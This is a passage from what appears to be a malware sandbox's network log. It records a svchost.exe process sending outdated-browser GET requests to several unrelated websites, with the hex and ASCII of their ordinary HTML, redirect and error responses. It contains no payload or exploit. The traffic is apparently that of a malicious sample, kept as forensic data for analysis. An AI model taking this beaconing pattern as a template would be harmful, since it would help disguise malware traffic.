2023-03-22 04:44:36 UTC	215	IN	Data Raw: 35 30 32 0d 0a 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 Data Ascii: 502-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"
2023-03-22 04:44:36 UTC	216	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	51189	104.21.65.224	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:41 UTC	216	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.com
2023-03-22 04:44:42 UTC	216	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:44:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Set-Cookie: PHPSESSID=8dd73ce1a917b5d53ecdcb71ebb9bc82; path=/ Location: https://hyabmagneter.se CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bncofpaNyeLNs1elKMUJ8CCvn3LWsWMooDDOzoumzV4kLpRhGcIJfFFs%2BddYd4igH3zQvPA2cdDlVkFAcNHVvHA9MkNDvhIxJoK1Zt2R%2Bbkbou6HiWVQN6hqlQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc7ea5a253a85-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:44:42 UTC	217	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	52021	83.223.113.46	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:44 UTC	217	OUT	GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: dataform.co.uk
2023-03-22 04:44:44 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: must-revalidate, no-cache, max-age=0 Keep-Alive: timeout=2, max=93 Content-Length: 48940 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: Accept-Encoding Server: Apache Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with Access-Control-Allow-Origin: * X-Powered-By: PHP/7.0.29 X-UA-Compatible: IE=EmulateIE10 X-Frame-Options: SAMEORIGIN X-Mod-Pagespeed: 1.9.32.14-0 Strict-Transport-Security: max-age=10886400 X-Powered-By: ASP.NET Date: Wed, 22 Mar 2023 04:44:44 GMT Connection: close
2023-03-22 04:44:44 UTC	218	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c Data Ascii: <!DOCTYPE html>...[if !(IE 6) \| !(IE 7) \| !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
2023-03-22 04:44:44 UTC	221	IN	Data Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source\|\|{}).conc
2023-03-22 04:44:45 UTC	229	IN	Data Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65 Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
2023-03-22 04:44:45 UTC	237	IN	Data Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
2023-03-22 04:44:45 UTC	245	IN	Data Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
2023-03-22 04:44:45 UTC	253	IN	Data Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
2023-03-22 04:44:45 UTC	261	IN	Data Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67 Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	53819	35.214.171.193	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	266	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: flamingorecordings.com
2023-03-22 04:45:06 UTC	267	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding SG-F-Cache: HIT X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT
2023-03-22 04:45:06 UTC	267	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
2023-03-22 04:45:06 UTC	283	IN	Data Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69 Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
2023-03-22 04:45:06 UTC	299	IN	Data Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
2023-03-22 04:45:06 UTC	315	IN	Data Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
2023-03-22 04:45:06 UTC	331	IN	Data Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20 Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	53931	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	266	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: diamir.de
2023-03-22 04:45:06 UTC	267	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.diamir.de/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:06 UTC	267	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	56207	75.2.95.235	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	266	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: ldh.la.gov
2023-03-22 04:45:06 UTC	333	IN	HTTP/1.1 406 Not Acceptable Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html Content-Length: 1346 Connection: close Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET
2023-03-22 04:45:06 UTC	334	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	55278	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	266	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net
2023-03-22 04:45:54 UTC	1339	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:53 GMT Content-Type: text/html Content-Length: 2599149 Connection: close Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT ETag: "27a8ed-5eceaf89b8f40" Accept-Ranges: bytes
2023-03-22 04:45:54 UTC	1340	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
